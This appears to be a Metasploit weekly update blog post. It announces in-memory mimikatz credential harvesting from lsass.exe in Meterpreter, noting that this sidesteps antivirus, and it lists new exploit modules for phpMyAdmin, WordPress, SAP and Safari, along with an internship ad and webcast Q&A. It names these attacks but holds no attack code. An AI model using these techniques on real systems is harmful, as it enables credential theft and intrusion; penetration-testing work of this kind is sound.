This update also comes with a shiny new way to steal credentials. The pentesters in the audience are no doubt aware of a tool called mimikatz that has been around for a while, but which invariably causes AV to lose its mind and ruin your day. Mimikatz, written by @gentilkiwi, is a tool that rummages through lsass.exe's memory looking for credential structures of various kinds. In most cases, it can grab cleartext passwords.
Now, thanks to @gentilkiwi's change to a compatible license (Creative-Commons-Attribution) and the integration efforts of Meatballs, Meterpreter can use this valuable technique completely in memory, saving you the headache of having to figure out how to run a packer.
Still Seeking Interns
I mentioned last week that the Metasploit Framework team is seeking an intern to help out over the summer in our secret underground exploit lair here in Austin. We've already gotten a number of good leads, so this week is about the last chance to get on board with our internship program. If you are passionate about open source security and want to spend your summer helping advance the state of the art with a team of world-class security professionals, check out the job requirements at http://r-7.co/MSF-INTERN and we'll see if we can't set up an interview in the next few days.
New Modules
This week, we have eight new modules, including the WordPress Total Cache exploit, Joe Vennix's Safari-based universal XSS module, Ben Campbell's implementation of waraxe's phpMyAdmin RCE exploit, and a pair of SAP modules from Andras Kabai based on the research by Dmitry Chastuhin.
- GroundWork monarch_scan.cgi OS Command Injection by juan vazquez and Johannes Greil exploits OSVDB-91051
- phpMyAdmin Authenticated Remote Code Execution via preg_replace() by Ben Campbell and Janek "waraxe" Vind exploits CVE-2013-3238
- Wordpress W3 Total Cache PHP Code Execution by juan vazquez, hdm, Christian Mehlmauer, and Unknown exploits OSVDB-92652
- SAP ConfigServlet Remote Code Execution by Andras Kabai and Dmitry Chastuhin exploits OSVDB-92704
- SAP ConfigServlet OS Command Execution by Andras Kabai and Dmitry Chastuhin exploits OSVDB-92704
- Apple Safari .webarchive File Format UXSS by joev
Availability
If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.
For additional details on what's changed and what's current, please see Brandont's most excellent release notes.
Webcast Q&A: OWASP Top 10 and Web App Scanning Webcast
First of all, a big thank you to all of you who participated in our OWASP Top 10 and Web App Scanning webcast last week. (If you missed it, you can view a recording here.) Because of an issue with the webcast platform, I wasn't able to see all of the audience questions while we were online. However, my colleagues were able to recover the unanswered questions, so I created questions and answers for them in the Metasploit discussion forum. Here they are:
- Which Metasploit editions include the web app testing feature?
- For penetration testing, is it more cost-effective to hire a consultant or buy software?
- How does Metasploit integrate with Nexpose?
- Can Metasploit Pro just be used for scanning?
- Can you automate Metasploit?
- In what language is Metasploit Pro developed?
- How much is Metasploit Pro?
- Will there be a cloud version of Metasploit?
- Should I scan websites with Metasploit or Nexpose?
If your question wasn't answered, please feel free to post it as a discussion in the Metasploit section. If you have a confidential question, please email info@rapid7.com.
Should I scan websites with Metasploit or Nexpose?
This depends on what you're trying to achieve:
Use Metasploit if you:
- Are looking for a pentesting tool to exploit vulnerabilities in web applications
- Have other penetration testing or phishing simulation needs
Use Nexpose if you:
- Are looking to identify vulnerabilities in web applications
- Are looking to do regular, automated scans
- Want to run a general vulnerability management program
---
This was an audience question from the webcast "OWASP Top 10 2013: What’s New - and How to Audit Your Web Apps". You can view a recorded version here: OWASP Top 10 and Web App Scanning Webcast | Rapid7.
Will there be a cloud version of Metasploit?
While Rapid7 is currently not planning to create a SaaS version of Metasploit, you can run Metasploit in the cloud. For more information, please view this blog post:
Also, you can scan virtualized (e.g. cloud) environments from Metasploit to audit their security. For more info, please read this blog post:
https://community.rapid7.com/community/metasploit/blog/2012/03/05/how-to-own-a-virtual-data-center
---
This was an audience question from the webcast "OWASP Top 10 2013: What’s New - and How to Audit Your Web Apps". You can view a recorded version here: OWASP Top 10 and Web App Scanning Webcast | Rapid7.
